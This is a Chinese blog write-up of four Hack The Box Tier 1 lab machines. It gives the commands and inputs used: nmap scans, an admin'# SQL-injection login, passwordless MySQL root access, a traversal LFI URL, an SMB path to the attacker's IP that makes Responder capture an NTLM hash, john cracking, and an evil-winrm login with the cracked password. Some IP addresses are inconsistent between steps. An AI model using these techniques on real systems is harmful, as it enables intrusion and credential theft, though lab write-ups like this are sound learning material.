Hack the box -- 靶机渗透测试(TIER1)

已于 2022-06-22 11:03:57 修改
阅读量1.3k 收藏
点赞数
文章标签: 数据库 mysql database
于 2022-06-22 10:51:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjishuxiaobai/article/details/125385764
版权

Hack the box -- 靶机渗透测试(TIER1)

写在前面

本文针对Hack the box 靶机TIER1渗透过程进行记录。

Appointment

开启在线靶机,靶机IP为10.129.208.78。

  1. 端口扫描
    扫描命令为 nmap -sS -sV -sC -v 10.129.208.78。由下图结果看出目标主机开放了80端口的http服务,所以尝试查看页面。
    在这里插入图片描述

2.SQL注入
浏览器输入靶机IP10.129.208.78,页面如下。发现是个登录界面,首先尝试常见密码登录如root:root admin:admin administrator:password,登录失败。

在这里插入图片描述
随即尝试SQL注入,用户名输入admin‘#,密码输入 123(可随意输入)。成功登录。
在这里插入图片描述

在这里插入图片描述
Flag 成功获取

Sequel

开启在线靶机,靶机IP为10.129.246.195。

  1. 端口扫描
    扫描命令为 nmap -sV -sC -v 10.129.246.195。发现在3306端口存在mysql服务,尝试用mysql连接数据库。
    在这里插入图片描述
  2. 数据库连接
    输入命令 **mysql -h 10.129.246.195 -u root ** 尝试连接(说明:由于MariaDB中root用户默认登录方式是使用socket连接,而不验证密码)。
    在这里插入图片描述
    查看数据库名
    在这里插入图片描述
    查看表名
    在这里插入图片描述
    查看表中数据
    在这里插入图片描述
    在这里插入图片描述
    Flag 成功获取

Crocodile

开启在线靶机,靶机IP为10.129.91.242

  1. 端口扫描
    扫描命令为 nmap -sV -sC -v 10.129.246.195。发现在21、80分别开启了ftp与http服务。
    在这里插入图片描述

  2. 尝试FTP连接
    输入命令为 ftp 10.129.91.242,提示我们连接要输入密码。
    在这里插入图片描述
    通过搜索vsftpd 3.0.3服务得知可用anonymous或ftp,密码任意进行登录。
    (详情参考链接: link
    登录成功
    通过查找发现存在allowed.userlist //allowed.userlist.passwd两个文件
    在这里插入图片描述
    将文件下载并打开查看内容,发现其中包含了账户与密码。
    在这里插入图片描述

  3. 查看80 端口 http服务
    输入目标主机IP 10.129.246.195,打开页面如下。由于之前获得账户与密码,所以尝试寻找登录界面,在浏览页面后没有发现登录界面,所以尝试目录爆破查找。
    在这里插入图片描述
    由于之前获得账户与密码,所以尝试寻找登录界面按钮与链接。在浏览页面后没有发现登录界面,所以尝试目录爆破进行查找。

  4. 目录爆破
    工具使用gobuster,输入命令gobuster dir --url http://10.129.91.242/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

  5. 尝试登录后台
    发现admin:rKXM59ESxesUFHAd可以成功登录。

在这里插入图片描述

在这里插入图片描述

Flag 获取成功

Responder

开启在线靶机,靶机IP为10.129.136.165

  1. 端口扫描
    扫描命令为 **nmap -p- --min-rate 5000 -sV -v 10.129.136.165 **。(说明:-p-实现全端口扫描,及1-65535;–min-rate {numbers},表示Nmap每秒至少发送包的数量)发现开放 80 http端口以及 5985 windows远程管理端口。
    在这里插入图片描述

  2. 查看http服务
    发现无法登录,显示无法连接 unika.htb 服务器。
    在这里插入图片描述
    所以修改本地hosts文件,添加 10.129.136.165 unika.htb(root用户下,输入命令 ** vi /etc/hosts **,按 i 进行输入,输入完成后ESC 输入 :wq保存退出)
    在这里插入图片描述
    刷新页面,发现成功进入。
    在这里插入图片描述
    尝试点击后发现,切换语言选项点击后,页面url变为 http://unika.htb/index.php?page=french.html
    在这里插入图片描述
    页面输入未被清理,可能会受到本地文件包含(LFI)漏洞的潜在攻击。

  3. 文件包含漏洞
    修改url为:http://unika.htb/index.php?page=…/…/…/…/…/…/windows/system32/drivers/etc/hosts页面返回如下
    在这里插入图片描述
    发现我们成功打开该目录下的hosts文件,说明存在本地文件包含漏洞(LFI)。既然存在LFI,即可能可以include我们自己的文件,同时如果我们开发的是smb协议,还可能获得windows进行身份验证的NTLM内容。

  4. Responder 进行NTLM捕捉
    Responder下载地址:https://github.com/lgandx/Responder(kali自带responder工具)
    输入 responder -I tun0 开启服务
    在这里插入图片描述
    修改页面url为http://unika.htb/?page=//10.10.16.12/whatever(其中 10.10.16.12 为本机IP地址,whatever 为请求文件,由于我们是想获得NTLM的验证码,所以可以任意填写)
    在这里插入图片描述
    Responder成功收到来自目标靶机的验证,发现验证码被加密。
    在这里插入图片描述

  5. 尝试用 哈希碰撞(hash crack)破解上述验证码
    工具使用: john the Ripper(kali系统自带john无需安装)
    在这里插入图片描述
    输入命令:john -w=/usr/share/wordlists/rockyou.txt hash.txt进行破解。(/usr/share/wordlists/目录下的rockyou.txt可能没有解压导致报错,进入到该目录下 使用 gunzip rockyou.txt.gz解压后,重新输入命令即可运行成功)
    在这里插入图片描述
    破解结果为 Administrator:badminton
    在这里插入图片描述

  6. 尝试远程登录目标主机
    由最开始的端口扫描得知目标主机开启了远程管理服务(windows remote management),且我们使用john破解到登录的用户名与密码,所以尝试登录目标主机。
    工具使用 :evil-winrm
    下载地址:https://github.com/Hackplayers/evil-winrm(也可尝试直接 sudo apt install evil-winrm 进行安装 )
    安装完成后,输入命令:evil-winrm -i 10.129.104.102 -u administrator -p badminton 成功连接
    在这里插入图片描述
    通过查找发现Flag文件在用户mike的桌面中
    在这里插入图片描述

li hack
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vsftpd-3.0.3.tar.gz
06-20
da119d084bd3f98664636ea05b5bb398 vsftpd-3.0.3.tar.gz
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Hack The Box靶机——Ambassador
qq_44029310的博客
10-10 716
本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consul命令执行。
编译安装 vsFTP 3.0.3
热门推荐
高飞的博客
05-22 20万+
VSFTP3.0.3
一次完整渗透测试靶场-内网渗透-内网不出网
BING
05-18 1577
0x01.虚拟机网络拓扑图 0x02.web外围打点,获取边界权限 1.通过对web外部靶机进行信息收集,发现存在80,445,3306等敏感信息端口 2.通过御剑扫描目录,得到敏感文件目录,其下有一个beifei.rar,phpmyadmin ,并且在192.168.0.106/phpmyadmin/ 发现数据库密码是弱口令 root root 通过beifei.rar文件中的 beifen\yxcms\protected\config.php 可以看见数据库密码 通过端口和目录文件,发现目前有
从0开始学渗透----HTB----Fawn
最新发布
yangmahaonan的博客
11-29 694
这里显示了vsFTPd 3.0.3是ftp版本,存在弱口令漏洞,我们直接输入name=FTP password=FTP。21端口上的ftp服务存在未授权访问,我们先连接到ftp服务器。该靶机开放21端口的ftp服务。
【靶场平台】一些免费好用的靶机渗透测试环境
羊柳树的博客
11-22 1万+
1、Vulhub: (各种漏洞环境集合,一键搭建漏洞测试靶场) https://vulhub.org/(在线版) https://github.com/vulhub/vulhub(离线版) 2、Vulnhub:(国外实战靶场,适合入门提高) https://www.vulnhub.com/ 3、Vulnstack(红队实战靶场,域、横向渗透、多层网络,强烈推荐,目前共7个靶场,网上writeup齐全) http://vulnstack.qiyuanxuetang.net/vuln/# 4、WebGoat:(
xss.haozi.me在线靶机挑战
m0_49137360的博客
08-01 411
xss.haozi.me靶场练习
Hack the box -- 靶机渗透测试TIER2)
wjishuxiaobai的博客
06-25 1576
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
线上靶机prompt.ml
lml_0916的博客
07-29 729
然后对fromData做了循环,然后创建了一个i,并且让input.name=i,这个i就是fromdata对象里的key值,也就是name,然后给value赋值为fromData的值,也就是Matt。这一关将prompt过滤成了alert,并配还把单引号给注释掉了,这就给我们使用了一个方便,也就是我们可以使用单引号将prompt给分开,反正单引号也会被省略。,并且这个对每一个p标签都进行了一个字符限制,不可以超过12个字符,这样就可以使用注释的方式,将多余的内容给注释掉,剩下的就可以拼凑成想要的样子。..
网络安全靶场推荐,通过实操能快速提升实战技能!
Y525698136的博客
10-18 1503
自学网络安全知识,具备一定的理论基础,缺乏实战经验,想去网络靶场体验一下,通过实操能快速提升实战技能!
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
HackTheBox靶机系列之困难Reel
04-09
主要介绍Reel靶机得整个利用过程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
[POC分享]CVE-2021-04-06 vsftpd 3.0.3 - Remote Denial of Service
「鸿渐之翼」的博客
04-23 2204
免责声明: 本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。 # Exploit Title: vsftpd 3.0.3 - Remote Denial of Service # Date: 22-03-2021 # Exploit Author: xynmaps # Vendor Homepage: https://security.appspot.com/vsftpd.html # Software L
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1255
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们一会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了一下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(四)venom1 这台靶机步骤让你充分了解反弹shell的原理及用法
hyjcking的博客
11-26 1381
这台靶机结合了很多渗透测试的知识,可以让你充分了解反弹shell的原理及用法
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2297
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值